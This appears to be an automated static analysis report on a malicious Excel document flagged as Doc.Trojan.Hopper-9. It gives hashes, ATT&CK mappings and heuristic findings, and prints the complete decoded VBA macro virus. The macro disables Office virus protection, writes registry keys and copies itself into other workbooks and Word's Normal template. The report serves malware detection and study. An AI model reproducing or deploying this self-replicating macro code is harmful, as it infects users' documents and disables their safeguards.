Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3a9d013c0a685103…

MALICIOUS

Office (OLE)

25.0 KB Created: 1998-12-06 01:57:43 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 82d8945ec7898d54b1a2af75bcf60130 SHA-1: 892679a337e1c6a4e7dbb2ca948787b611bdf9ac SHA-256: 3a9d013c0a685103bd3ecc620f18c0d60755760f7e52a9c613424629679d46cc
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Excel document containing VBA macros. The macros utilize `WScript.Shell` and `CreateObject` to write registry keys, indicating an attempt to establish persistence. The `Workbook_Deactivate` subroutine explicitly writes to `HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6` and `HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6`. The presence of `Shell()` calls and `WScript.Shell` usage strongly suggests the execution of arbitrary commands or the download of further malicious content.

Heuristics 6

  • ClamAV: Doc.Trojan.Hopper-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-9
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        On Error Resume Next
        Set WSHshell = CreateObject("WScript.Shell")
        WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        On Error Resume Next
        Set WSHshell = CreateObject("WScript.Shell")
        WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2957 bytes
SHA-256: 4c9ef587beae8bc9fc576298e3d9886d265d47a336ee948747ef198027b1ebed
Detection
ClamAV: Doc.Trojan.Hopper-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
Private Sub Document_Close()
    On Error Resume Next
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        For i = 1 To 19
            NT.InsertLines i, AD.Lines(i, 1)
        Next
    End If
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        For i = 1 To 19
            AD.InsertLines i, NT.Lines(i, 1)
        Next
    End If
End Sub
'Ex-cell v0.1 /1nternal
Private Sub Workbook_Deactivate()
    On Error Resume Next
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
    WSHshell.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
    For i = 1 To Workbooks.Count
        If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
            For y = 1 To 45
                Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines y, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(y, 1)
            Next
        End If
    Next
    Set WordObj = CreateObject("Word.Application")
    Set NT = WordObj.Templates(1).VBProject.VBComponents(1).CodeModule
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        WordObj.Options.SaveNormalPrompt = False
        NT.DeleteLines 1, NT.CountOfLines
        For i = 1 To 19
            NT.InsertLines i, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(i, 1)
        Next
    End If
    Set NT = Nothing
    WordObj.Quit
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True